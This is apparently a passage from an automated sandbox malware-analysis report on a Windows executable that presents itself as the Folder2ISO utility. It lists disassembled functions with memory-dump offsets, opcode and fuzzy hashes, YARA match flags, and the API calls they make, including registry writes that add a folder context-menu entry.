                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53078f9360da3151b94bea40bf2d4f37547c2a37710355a3f97e3d3db9638423
                  • Instruction ID: 369b9c49eb3977ee7b1ce5bc3a1cf97fcf2a13712bb1534c4348e6e1d03f08f9
                  • Opcode Fuzzy Hash: 53078f9360da3151b94bea40bf2d4f37547c2a37710355a3f97e3d3db9638423
                  • Instruction Fuzzy Hash: 2E21AE73D143238FC388DFB6ECB606A77A3FB82317F45662E980163525CA3529008AD5
                  Function 02DB65A3 Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4036dc50a6ba1265d05ef387ada137794740ffea69e48385610d45426d1812cc
                  • Instruction ID: e79fce99f358ee221bf85cfb50f4a80b8950bd5393aa381a0cfa5c5c6ead03b9
                  • Opcode Fuzzy Hash: 4036dc50a6ba1265d05ef387ada137794740ffea69e48385610d45426d1812cc
                  • Instruction Fuzzy Hash: C90152F2A0034187DF229E64D4D4B77A6AD9F86718F19403CD90A9B340EB76ED25CAE1
                  Function 031F1F18 Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 479bdd4044c68134c32f5256fcc13b240803d6a441178903a132768355276f19
                  • Instruction ID: c50a2275a999667e9cc805d6cf7a6aa86a2064d4b70de08bc2dc46f6e67c15dc
                  • Opcode Fuzzy Hash: 479bdd4044c68134c32f5256fcc13b240803d6a441178903a132768355276f19
                  • Instruction Fuzzy Hash: 71214CB16083809FD324DF19C85179FBBE6EBD6214F045A2DE19A8B391D775D445CB03
                  Function 02DB388B Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ff8ccb61d56d8f2e3ab99be44ae1ae0ab6f50577f3c00b9020836bcb13772d6a
                  • Instruction ID: 78d94c8d0b5e2ea19d701fccda2f963f4cdcbe9adef2042f598321bdfa8751b5
                  • Opcode Fuzzy Hash: ff8ccb61d56d8f2e3ab99be44ae1ae0ab6f50577f3c00b9020836bcb13772d6a
                  • Instruction Fuzzy Hash: 142168B22083808FD324DF18C8917AFBBE2ABC6204F04192EE59A87391D775D845CB13
                  Function 02DA7A55 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1425872b8d18208a7fef4a6beee2a1418ee8181daa84fabda5018b43af8ea23
                  • Instruction ID: 70c476345a2a5ec1c9ce63d9994dcd20663eab91278625e99ef421fcdf10da2f
                  • Opcode Fuzzy Hash: e1425872b8d18208a7fef4a6beee2a1418ee8181daa84fabda5018b43af8ea23
                  • Instruction Fuzzy Hash: E8114A7460C202ABD71CCF04C9A0A2EB7E2EB89608F18891CE48A57790C330DD41CB9A
                  Function 02DC99F8 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 32cd53bc3d67d8c78b6cad116958d3d3dcc72feff9e27c2f25fdb27050c602b2
                  • Instruction ID: 91d4a65438d7c41492d8f2b5a61dea4c693e7822c154876d403a529fb0200a76
                  • Opcode Fuzzy Hash: 32cd53bc3d67d8c78b6cad116958d3d3dcc72feff9e27c2f25fdb27050c602b2
                  • Instruction Fuzzy Hash: 8C112B31A092808FD3168F24CC606E4FBB1EF97314B29059FC5C58B653C3396C1ACB54
                  Function 03207465 Relevance: .1, Instructions: 51COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43f88f0958e45c8c4dfa2da3b896ebbb6d4c0fe368b44e8f183dd7cecafe4263
                  • Instruction ID: 453f38d38773f687f0d4c877588bc0694fd36ba0ab1b8a35fcfb7b6ad5bfb975
                  • Opcode Fuzzy Hash: 43f88f0958e45c8c4dfa2da3b896ebbb6d4c0fe368b44e8f183dd7cecafe4263
                  • Instruction Fuzzy Hash: 2011A2B4611641CFD325CF19C494A12F7F2FB9A310B18899DE4868B766C335F886CF84
                  Function 02DC8DD8 Relevance: .1, Instructions: 51COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8328086461560af39ea86ab85d5c7ee35d91eb4c708e008a165f6b96ca56b291
                  • Instruction ID: aa3d353a6c88337e5c7874017e8e12ed7514370464a76bc28407ea3d5df539d8
                  • Opcode Fuzzy Hash: 8328086461560af39ea86ab85d5c7ee35d91eb4c708e008a165f6b96ca56b291
                  • Instruction Fuzzy Hash: C711B378605641CFD325CF19C4A4A12F7F2FF9A310B24899DD4868B765C335E842CF84
                  Function 031D3680 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 38697340c001137936de3b69e63336a2e618e74fd09affbd9f2150d687ba1b89
                  • Instruction ID: 07e8d6e6e7fc9d5fb0f69bd65b4d9dc664a705af69e7228f93859a6096af1c59
                  • Opcode Fuzzy Hash: 38697340c001137936de3b69e63336a2e618e74fd09affbd9f2150d687ba1b89
                  • Instruction Fuzzy Hash: EEF0B43A71521A1BA350DCBEFCC8967B395D7CA114B0C4439E951D3301C569E54A9295
                  Function 02D94FF3 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d37386d8725380e62c96ac8b52bfea25f76388fb4c5f66824f0e05891f67464
                  • Instruction ID: ec808544984dc19d1b6b2976cc38bd61ad362f55f78275678eba868abf93078b
                  • Opcode Fuzzy Hash: 1d37386d8725380e62c96ac8b52bfea25f76388fb4c5f66824f0e05891f67464
                  • Instruction Fuzzy Hash: 52F0E9367242161BD711DDBAFCC4A67B396D7C9114B181439F985D3301D575EC06D2D4
                  Function 02D90E37 Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                  • Instruction ID: 5a2d8e2c74aa71715f5381c7bb6fe0f13dc7d0a5d716d86b47af0771d6914e37
                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                  • Instruction Fuzzy Hash: 6F01B634A11108EFCF14DF98D284AADB7BAFB44315F208599E8159B391D730AE81DB90
                  Function 02DA87D3 Relevance: .0, Instructions: 30COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2262cc2677fc59a7ee3387558a5e77cb053f13210b65ba9d5fc86f60cb35b10f
                  • Instruction ID: a25fa85e1154e70c958bde9440dc6202d6283b281f9ad37b27a1b5b7b8466b60
                  • Opcode Fuzzy Hash: 2262cc2677fc59a7ee3387558a5e77cb053f13210b65ba9d5fc86f60cb35b10f
                  • Instruction Fuzzy Hash: 09F03A78509346DBCB00CF18C85097ABBB1FF55284F00186DF88097320E731CD55DB96
                  Function 02DA49A4 Relevance: .0, Instructions: 25COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e0aa6840e49557ee37526951d65866db8320510c2587df2e83e54b3c0c9bd87
                  • Instruction ID: 53c239e6b1b1b195f14bd2183e6e2de006d3f48de4d08933df4a93eaf0e73bce
                  • Opcode Fuzzy Hash: 7e0aa6840e49557ee37526951d65866db8320510c2587df2e83e54b3c0c9bd87
                  • Instruction Fuzzy Hash: 45E09235A58150978E01AF10941193D7323EB8720CB812428E4139B351CA609812DE9E
                  Function 031E277E Relevance: .0, Instructions: 17COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c2a11a337342c75a9a752130e9b6a5c3ef28eea434abb6be61b101f375ca4e9
                  • Instruction ID: 0d0807ba73aca3886adf36e7b1aa1118bf01cc69d3e766fea71135dd9745fc90
                  • Opcode Fuzzy Hash: 9c2a11a337342c75a9a752130e9b6a5c3ef28eea434abb6be61b101f375ca4e9
                  • Instruction Fuzzy Hash: 9ED0A774504200D78508EE10E961439B3717B5F104F413C18E093E7150DB22D8428606
                  Function 02DA40F1 Relevance: .0, Instructions: 17COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 524ec53f8f025c9bc8f0194b9666948f93d0c6cca8db9f24bf33e3fb2e8d7451
                  • Instruction ID: a87af10ff34916cbf8524877d7ae16480f5dcc7fd889a99f705cd3e569d2ca41
                  • Opcode Fuzzy Hash: 524ec53f8f025c9bc8f0194b9666948f93d0c6cca8db9f24bf33e3fb2e8d7451
                  • Instruction Fuzzy Hash: 6DD0C775548100DB8604DF64D9618397772EB47314F85343DF497D7350DAE1DC11CD6A
                  Function 02DC7895 Relevance: .0, Instructions: 14COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f1c3e6dd981ce349d51b98b461f0f24383b889cccb00d3217a426753ea933de
                  • Instruction ID: 6bb2da6a6c5ce69bafe81cae5070dc1d6d06f0b11a25044813fc8bc6a659f91f
                  • Opcode Fuzzy Hash: 4f1c3e6dd981ce349d51b98b461f0f24383b889cccb00d3217a426753ea933de
                  • Instruction Fuzzy Hash: CBC04C7865E14056E21DDB15AC51B36A26E9B97218F24A12CD50963297D6B0E803456C
                  Function 031F2BDC Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b5b8c7c1b951d393fc708ea62af6410ebcfb8c3be84c569b635d6cffb032a0d
                  • Instruction ID: e72ee3bbfcf99699b41278f822b05211c27798eea6479b608a2b5d02b3454b44
                  • Opcode Fuzzy Hash: 8b5b8c7c1b951d393fc708ea62af6410ebcfb8c3be84c569b635d6cffb032a0d
                  • Instruction Fuzzy Hash: 46C012B8A082208BC600FA11A06077FB3746B8B200F006408D45D7B204CF24AA0A878E
                  Function 02DB454F Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 086fc57991ae0ba9817aa7083d254cb0591928cd3add256ce0f8e910ddea7a8c
                  • Instruction ID: d30073dcaf647369713aebc39db5d9a49c42c7ed4f0cd2d006ffbc0292382a34
                  • Opcode Fuzzy Hash: 086fc57991ae0ba9817aa7083d254cb0591928cd3add256ce0f8e910ddea7a8c
                  • Instruction Fuzzy Hash: 70C012349085508BC901AF10E41066DB3669F87204F001418E40D73340CA20FE158B9E
                  Function 0320403F Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64f9f6427fbac986f4bc91682e81e140d00b3ddd4f775c4c8564da909b9dac71
                  • Instruction ID: bfe4fa2938f7d25189f7bee66a19272e6d45bb91f66684c1768df886bfd6bc5d
                  • Opcode Fuzzy Hash: 64f9f6427fbac986f4bc91682e81e140d00b3ddd4f775c4c8564da909b9dac71
                  • Instruction Fuzzy Hash: 65B09BF9D5D214C6E1107B50390661570611713689F592070CB473B1C7A5B1D15D449F
                  Function 02DC59B2 Relevance: .0, Instructions: 11COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc1428c87abcc92fd9d4c71b66226f09dc8b33dda63d41135ddf3cb924024b52
                  • Instruction ID: cd9255efc0006f54331fc00e0f53273f1ab7eece6c9f0d97697e24917840dbf8
                  • Opcode Fuzzy Hash: bc1428c87abcc92fd9d4c71b66226f09dc8b33dda63d41135ddf3cb924024b52
                  • Instruction Fuzzy Hash: BFB092E1D88205C6F0102B502D06626F02B9723B16F162076CB0737FC0A572EA1E4C6F
                  Function 031EF9AD Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33ac987782efefc9bebad33d9cfa2745fec202af8c4028e083cdc503448b94e1
                  • Instruction ID: b1977a2ccd19ffc650ed8c1f83361b08934d393a6df89eff8360afc0b849af4a
                  • Opcode Fuzzy Hash: 33ac987782efefc9bebad33d9cfa2745fec202af8c4028e083cdc503448b94e1
                  • Instruction Fuzzy Hash: 7EB01234A08500CB821CCD21E150831F3B6A75F210B227508C40AB3955DB21E8818748
                  Function 031D1EA1 Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e849ec409e56acd88d056f1e1279ffdc2200773e4589f4e2c1a9436d96bad72e
                  • Instruction ID: f1bbaecae6ddedc7fbe05d8bb8e2e05fcedf177716acb5c7f3975b36b1964f4a
                  • Opcode Fuzzy Hash: e849ec409e56acd88d056f1e1279ffdc2200773e4589f4e2c1a9436d96bad72e
                  • Instruction Fuzzy Hash: 06B09274C081A09ACB528E20A1848B1BB74EA27212F05B5D484403700AC524814C8B08
                  Function 02DB1320 Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ebda92b30e7ff18ca0be137fdab0db57db891d8bb89d55d7072e0db1f27d4ee5
                  • Instruction ID: 3323670eace298c6a8d1c772ff17203502c1fbb495582865feb988f942c3ddda
                  • Opcode Fuzzy Hash: ebda92b30e7ff18ca0be137fdab0db57db891d8bb89d55d7072e0db1f27d4ee5
                  • Instruction Fuzzy Hash: 54B09238E08100CA8218CE008460471F2B9AB6B501B202518804BA3611C620E904CA4C
                  Function 0320A21A Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction ID: c6023400509a16f557e892a86fdd8146675fc6926eccb1ad2bee86c83abd2167
                  • Opcode Fuzzy Hash: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction Fuzzy Hash:
                  Function 02DCBB8D Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction ID: c6023400509a16f557e892a86fdd8146675fc6926eccb1ad2bee86c83abd2167
                  • Opcode Fuzzy Hash: 2f276dd15a5e5a708d69c40de4f54a2a58797a7be792850d9f6c8402b82eeb83
                  • Instruction Fuzzy Hash:
                  Function 006217F2 Relevance: 65.1, APIs: 26, Strings: 11, Instructions: 332windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMessagePos.USER32 ref: 00621803
                  • CreatePopupMenu.USER32 ref: 00621815
                  • CreatePopupMenu.USER32 ref: 00621836
                  • InsertMenuW.USER32(00000000,00000000,00000400,0000000B,00647BF0), ref: 00621851
                  • CheckMenuRadioItem.USER32(00000000,00000000,0000000C,00000400), ref: 00621872
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006218A6
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006218DD
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621919
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621955
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621993
                  • GetWindowLongW.USER32(?,000000EC), ref: 006219AF
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006219C5
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 006219F1
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A10
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A2F
                  • InsertMenuItemW.USER32(?,000000FF,00000001,00000030), ref: 00621A4A
                  • TrackPopupMenu.USER32(00000030,00000180,?,?,00000000,?,00000000), ref: 00621A6A
                  • DestroyMenu.USER32(?,?,CloseWhenDone,00000000,?,RevealWhenDone,00000000,?,AllowMultipleInstances,00000001), ref: 00621A76
                  • DialogBoxParamW.USER32(00000002,?,00622DA2,00000000), ref: 00621A8F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Menu$InsertItem$Popup$Create$CheckDestroyDialogLongMessageParamRadioTrackWindow
                  • String ID: 0$AllowMultipleInstances$C$CloseWhenDone$Folder2ISO$LangId$RevealWhenDone$TopMost$Usage:folder2iso [switches] [source folder]Switches:-label [label]-output [target iso file]Examples:folder2iso "d:\foo$https://github.com/imgdrive/Folder2ISO$https://github.com/imgdrive/Folder2ISO/issues
                  • API String ID: 3856043901-1160743212
                  • Opcode ID: 7b71c6f5149e35a7f61da028a1d67de30c7875d642998f7f14c7790f2aad5576
                  • Instruction ID: c2a189a04244e15c52d8f17e5f81e187631c35d59e54837d8e9580f82d969ce7
                  • Opcode Fuzzy Hash: 7b71c6f5149e35a7f61da028a1d67de30c7875d642998f7f14c7790f2aad5576
                  • Instruction Fuzzy Hash: FEA1137150C714BBD310AF64EC85E6F7BEEEB87364F210A1EF1559A2D0DA709A408F26
                  Function 006223AF Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 231windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 006223DF
                  • GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 00622401
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 0062241E
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 00622437
                  • SetDlgItemTextW.USER32(?,0000000E,?), ref: 00622483
                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 006224A9
                  • wsprintfW.USER32 ref: 006224ED
                  • MessageBoxW.USER32(?,?,Folder2ISO,00000021), ref: 00622506
                  • GetDlgItem.USER32(?,00000010), ref: 00622577
                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00622581
                    • Part of subcall function 00622145: GetDlgItemTextW.USER32(?,0000000D,?,00000104), ref: 0062216B
                    • Part of subcall function 00622145: SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?,?,00000104), ref: 00622193
                    • Part of subcall function 00622145: CoInitialize.OLE32(00000000), ref: 0062219A
                    • Part of subcall function 00622145: CoUninitialize.OLE32(?,?,00000104), ref: 006221C4
                  • _memset.LIBCMT ref: 006225C5
                  • GetDlgItemTextW.USER32(?,0000000F,?,00000080), ref: 006225DA
                  • GetWindowLongW.USER32(?,000000EB), ref: 006225E8
                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 006225FF
                  • GetDlgItem.USER32(?,00000011), ref: 00622612
                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0062261E
                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00622655
                  • SetTimer.USER32(?,0000000F,000001F4,00000000), ref: 00622660
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$LongMessageWindow$PathSend$FolderFullInitializeNameTimerUninitialize_memsetwsprintf
                  • String ID: .iso$FileSystem$Folder2ISO$Folder2ISO$Folder2ISO 1.2
                  • API String ID: 94365609-1827313546
                  • Opcode ID: ac0274ab9c8491992963da8351e5865c19c914602fcbb2b450748a74d7192b3e
                  • Instruction ID: 8d6e2fc3c8b19eaf04189caad2dd0bab2ce0c08b83ab484619c348bea0c77111
                  • Opcode Fuzzy Hash: ac0274ab9c8491992963da8351e5865c19c914602fcbb2b450748a74d7192b3e
                  • Instruction Fuzzy Hash: 987112B21047267BD730EB60EC96FEB779EEF49310F000819F645E6182DBB4DA44CAA1
                  Function 00621635 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 139registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000,00000001), ref: 00621669
                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Classes,00000000,0002001F,?), ref: 00621691
                  • RegCreateKeyExW.ADVAPI32(?,Folder\shell\Folder2ISO,00000000,00000000,00000000,00020006,00000000,?,?), ref: 006216BB
                  • RegSetValueExW.ADVAPI32(?,Icon,00000000,00000001,?,00000000), ref: 0062171C
                  • RegCreateKeyExW.ADVAPI32(?,command,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0062173C
                  • lstrlenW.KERNEL32(?), ref: 00621761
                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000), ref: 0062177E
                  • RegCloseKey.ADVAPI32(?), ref: 00621784
                  • RegCloseKey.ADVAPI32(?), ref: 0062178A
                  • RegCloseKey.ADVAPI32(?), ref: 00621790
                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Classes,00000000,0002001F,?,?,00000000,00000001), ref: 006217AA
                  • RegDeleteKeyW.ADVAPI32(?,Folder\shell\Folder2ISO\command), ref: 006217C3
                  • RegDeleteKeyW.ADVAPI32(?,Folder\shell\Folder2ISO), ref: 006217CE
